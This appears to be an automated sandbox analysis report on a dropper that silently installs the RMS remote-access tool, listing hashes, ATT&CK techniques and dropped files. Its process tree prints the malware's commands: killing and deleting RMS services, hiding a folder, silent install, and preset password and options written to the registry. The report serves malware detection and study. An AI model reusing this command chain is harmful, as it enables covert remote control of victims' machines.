rms | 3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3

Analysis

max time kernel
148s
max time network
158s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
24-11-2022 12:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe
Size

2.8MB
MD5

9f8c4acc5a1b56b472d693b14a18ce10
SHA1

80361275f2d655895e6939f5a5ce4b7b40221a0c
SHA256

3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3
SHA512

b530e40e77c0d28370f5470c3b4c5587e39f7cc130177086bc36daa46faf6eeb74966e7b6ac103a833ada60c0d8df1d09916196c5d5204b01a9030ab8a6faf3c
SSDEEP

49152:QAJYxdPGHh9DdPAKcbOsFLMG3WazYYEW+lquVf8SwgmXH7Sb7rzDEjSmJ:7JYb0h0KcbLFLMbasYsGxHAjIjj

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 10 IoCs

pid	Process
560	install.exe
2044	7z.exe
1536	ses.exe
980	rutserv.exe
1880	rutserv.exe
1292	rutserv.exe
1792	rutserv.exe
624	rfusclient.exe
1260	rfusclient.exe
1404	rfusclient.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1584	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b0000000122f9-58.dat	upx
behavioral1/files/0x000b0000000122f9-59.dat	upx
behavioral1/files/0x000b0000000122f9-61.dat	upx
behavioral1/memory/560-75-0x0000000000400000-0x0000000000759000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
580	cmd.exe

Loads dropped DLL 12 IoCs

pid	Process
1960	WScript.exe
336	cmd.exe
336	cmd.exe
2044	7z.exe
336	cmd.exe
336	cmd.exe
336	cmd.exe
1924	cmd.exe
1924	cmd.exe
1924	cmd.exe
1792	rutserv.exe
1792	rutserv.exe

Drops file in Windows directory 43 IoCs

description	ioc	Process
File created	C:\Windows\spom\f337ec5d-de05-4a2e-8405-50027a596b4f.tmp	cmd.exe
File created	C:\Windows\spom\install.exe	cmd.exe
File created	C:\Windows\spom\java_install_reg.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220901-135352-0.log	cmd.exe
File created	C:\Windows\spom\dd_wcf_CA_smci_20220901_133528_724.txt	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561.html	cmd.exe
File created	C:\Windows\spom\ose00000.exe	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI6476.txt	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220901-135651-0.log	cmd.exe
File created	C:\Windows\spom\RGI24D0.tmp	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00001.log	cmd.exe
File created	C:\Windows\spom\68c96edb-4338-4ded-8ac6-4ae2ce43119b.tmp	cmd.exe
File created	C:\Windows\spom\e2431e2a-8066-4d94-bbc3-b73a76ab1f0f.tmp	cmd.exe
File created	C:\Windows\spom\FXSAPIDebugLogFile.txt	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220901-140302-0.log	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561-MSI_netfx_Full_x64.msi.txt	cmd.exe
File created	C:\Windows\spom\19332042-4f3d-4265-9c23-c52b517947e9.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI640E.txt	cmd.exe
File created	C:\Windows\spom\dd_wcf_CA_smci_20220901_133527_258.txt	cmd.exe
File created	C:\Windows\spom\java_install.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220901-135047-0.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220901-135957-0.log	cmd.exe
File created	C:\Windows\spom\RDE993.tmp	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\b684c365-a914-4e5f-a38a-bb5b0b40a917.tmp	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\4ced5ba9-fb64-4b4f-9d15-e20e648456ab.tmp	cmd.exe
File created	C:\Windows\spom\795ddf6f-7912-4640-8ac1-2353a7f0ea89.tmp	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI6476.txt	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File created	C:\Windows\spom\35675940-12ea-43e6-9a29-2fde6cdfd31c.tmp	cmd.exe
File created	C:\Windows\spom\dd_SetupUtility.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI640E.txt	cmd.exe
File created	C:\Windows\spom\RGI24D0.tmp-tmp	cmd.exe
File created	C:\Windows\spom\ses.exe	cmd.exe
File created	C:\Windows\spom\SetupExe(20220901134306790).log	cmd.exe
File created	C:\Windows\spom\Admin.bmp	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00000.log	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1120	sc.exe
2020	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 2 IoCs

evasion

pid	Process
664	taskkill.exe
268	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
980	rutserv.exe
980	rutserv.exe
980	rutserv.exe
980	rutserv.exe
1880	rutserv.exe
1880	rutserv.exe
1292	rutserv.exe
1292	rutserv.exe
1792	rutserv.exe
1792	rutserv.exe
1792	rutserv.exe
1792	rutserv.exe
1260	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1404	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	268	taskkill.exe
Token: SeDebugPrivilege	980	rutserv.exe
Token: SeDebugPrivilege	1292	rutserv.exe
Token: SeTakeOwnershipPrivilege	1792	rutserv.exe
Token: SeTcbPrivilege	1792	rutserv.exe
Token: SeTcbPrivilege	1792	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 1960	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	27
PID 2016 wrote to memory of 1960	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	27
PID 2016 wrote to memory of 1960	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	27
PID 2016 wrote to memory of 1960	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	27
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 1960 wrote to memory of 560	1960	WScript.exe	28
PID 2016 wrote to memory of 580	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	29
PID 2016 wrote to memory of 580	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	29
PID 2016 wrote to memory of 580	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	29
PID 2016 wrote to memory of 580	2016	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	29
PID 560 wrote to memory of 336	560	install.exe	31
PID 560 wrote to memory of 336	560	install.exe	31
PID 560 wrote to memory of 336	560	install.exe	31
PID 560 wrote to memory of 336	560	install.exe	31
PID 336 wrote to memory of 2044	336	cmd.exe	33
PID 336 wrote to memory of 2044	336	cmd.exe	33
PID 336 wrote to memory of 2044	336	cmd.exe	33
PID 336 wrote to memory of 2044	336	cmd.exe	33
PID 336 wrote to memory of 1536	336	cmd.exe	34
PID 336 wrote to memory of 1536	336	cmd.exe	34
PID 336 wrote to memory of 1536	336	cmd.exe	34
PID 336 wrote to memory of 1536	336	cmd.exe	34
PID 1536 wrote to memory of 1924	1536	ses.exe	35
PID 1536 wrote to memory of 1924	1536	ses.exe	35
PID 1536 wrote to memory of 1924	1536	ses.exe	35
PID 1536 wrote to memory of 1924	1536	ses.exe	35
PID 1924 wrote to memory of 664	1924	cmd.exe	37
PID 1924 wrote to memory of 664	1924	cmd.exe	37
PID 1924 wrote to memory of 664	1924	cmd.exe	37
PID 1924 wrote to memory of 664	1924	cmd.exe	37
PID 1924 wrote to memory of 268	1924	cmd.exe	39
PID 1924 wrote to memory of 268	1924	cmd.exe	39
PID 1924 wrote to memory of 268	1924	cmd.exe	39
PID 1924 wrote to memory of 268	1924	cmd.exe	39
PID 1924 wrote to memory of 1504	1924	cmd.exe	40
PID 1924 wrote to memory of 1504	1924	cmd.exe	40
PID 1924 wrote to memory of 1504	1924	cmd.exe	40
PID 1924 wrote to memory of 1504	1924	cmd.exe	40
PID 1504 wrote to memory of 1712	1504	net.exe	41
PID 1504 wrote to memory of 1712	1504	net.exe	41
PID 1504 wrote to memory of 1712	1504	net.exe	41
PID 1504 wrote to memory of 1712	1504	net.exe	41
PID 1924 wrote to memory of 1832	1924	cmd.exe	42
PID 1924 wrote to memory of 1832	1924	cmd.exe	42
PID 1924 wrote to memory of 1832	1924	cmd.exe	42
PID 1924 wrote to memory of 1832	1924	cmd.exe	42
PID 1832 wrote to memory of 1104	1832	net.exe	43
PID 1832 wrote to memory of 1104	1832	net.exe	43
PID 1832 wrote to memory of 1104	1832	net.exe	43
PID 1832 wrote to memory of 1104	1832	net.exe	43
PID 1924 wrote to memory of 1120	1924	cmd.exe	44
PID 1924 wrote to memory of 1120	1924	cmd.exe	44
PID 1924 wrote to memory of 1120	1924	cmd.exe	44
PID 1924 wrote to memory of 1120	1924	cmd.exe	44
PID 1924 wrote to memory of 2020	1924	cmd.exe	45
PID 1924 wrote to memory of 2020	1924	cmd.exe	45
PID 1924 wrote to memory of 2020	1924	cmd.exe	45
PID 1924 wrote to memory of 2020	1924	cmd.exe	45
PID 1924 wrote to memory of 1572	1924	cmd.exe	46

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe
"C:\Users\Admin\AppData\Local\Temp\3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\stop.js"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Users\Admin\AppData\Local\Temp\install.exe
    "C:\Users\Admin\AppData\Local\Temp\install.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2379.tmp\new.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:336
    - - C:\Users\Admin\AppData\Local\Temp\2379.tmp\7z.exe
        
        7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2044
    - - C:\Users\Admin\AppData\Local\Temp\ses.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1536
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\29B0.tmp\ses.bat" -p "
        6⤵
        Loads dropped DLL
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:1924
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rfusclient.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:664
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rutserv.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:268
        
        C:\Windows\SysWOW64\net.exe
        
        net stop netaservice
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1504
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop netaservice
        8⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\net.exe
        
        net stop rmanservice
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1832
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        8⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete netaservice
        7⤵
        Launches sc.exe
        
        PID:1120
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete rmanservice
        7⤵
        Launches sc.exe
        
        PID:2020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        7⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Windows\spom"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /silentinstall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /firewall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1880
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
        7⤵
        
        PID:544
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
        7⤵
        
        PID:456
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
        7⤵
        
        PID:940
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70090c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313934382e38323736333832363339084c6963656e73657306ce524d532d5a2d35303931623845366536346134624633363931333344344634363561383563306269593253326459586c52664477776e493233696c6848676f4f4350344f6d6436654b4734594c69674130664a794e74446c5246446c52435646554e4c6a395453304a5a5551776558435a7a623174634477454542516b4a593346385731775044465a454477426e5947494446514d4141775275416d4a33594151434241634f4831564562484577584577504151494d486c4d384f57304f4631705653323959586a516962513d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
        7⤵
        
        PID:892
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e007600610072006f006e0069006e006100320035004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00310033003700410041003900460039002d0042003500440046002d0034003200360043002d0042003900420042002d004600330041003600340036004100330034003300350032007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
        7⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
        7⤵
        
        PID:580
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
        7⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /start
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
  2⤵
  - Deletes itself
  PID:580

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:624
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1260
- - C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
    C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2379.tmp\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2379.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2379.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2379.tmp\Sys.7z

Filesize
2.2MB

MD5
8773672b026eedd00829ef5e9d07fb16

SHA1
b193f49182cc95fd0b451814ac949f36eecd2292

SHA256
9e56307aa54b8f50816fd7ed4a0fd44c454aebd34f694607fc19e5251c33590e

SHA512
421997f31703c5ae4ba68adaaec1f0377332ecaeb8d6acac57d5ebb6f79e044c7bc7784b7f70acbdf180aacac0b36a8e53eed7caa861daa7628b62e4f5097684

Download Submit
C:\Users\Admin\AppData\Local\Temp\2379.tmp\new.bat

Filesize
65B

MD5
13310849fd8d70c608fd7b02fa86eea5

SHA1
9e79bc5cc474fefbe6ec40f8403ba74bb271f393

SHA256
03d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42

SHA512
909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30

Download Submit
C:\Users\Admin\AppData\Local\Temp\29B0.tmp\ses.bat

Filesize
10KB

MD5
ff2e3f863425a94791b58f250288d69f

SHA1
d88abcad2e8040895720c206c81b189b85d1825d

SHA256
4d5fdfbab9114a36b3660466f4c6e78c8b3778a305b110befe784401d807dfd3

SHA512
a3c7711be9fcbee9aaed31e0b8686dd9d6e91dcd01b1b506e808eac299ae25343f061c12403bb65f14d99fc1306e2d1202c040f8cc81608a2dead863e19947e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

Filesize
300B

MD5
435256bce54fcee85ccf835b17d98ffe

SHA1
e62f15e6ef8c251cfb4fb59823c795eb2c93afd4

SHA256
4efc86e4ba3a8aef924cf4b2028971dd416410b5880206d270146b7174278b3e

SHA512
e9ae0661e1a35e5012983714b00d1df114a16c9a6a701a3a2ceb36b8dba313be31700195dbf3d9c4bc5369ee281b73629c92049b70206685a01f76b62af53c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
2.7MB

MD5
0c9dd761d8ebfe02024c9fdfa3653d0f

SHA1
6f068744452f58158019a04f41409422b8f11d06

SHA256
c576a23e8d45cac360dbf29af754003acf68409a4f043bd9c67a431f32c618d6

SHA512
2ec33438a4852bc8e90b66730ca20d23dfa6b7be000ff0264f967143f64293a44154f4ee9be7256f6c49ba25cb79e83b68813532de546637faef3457661b7a1e

Download Submit
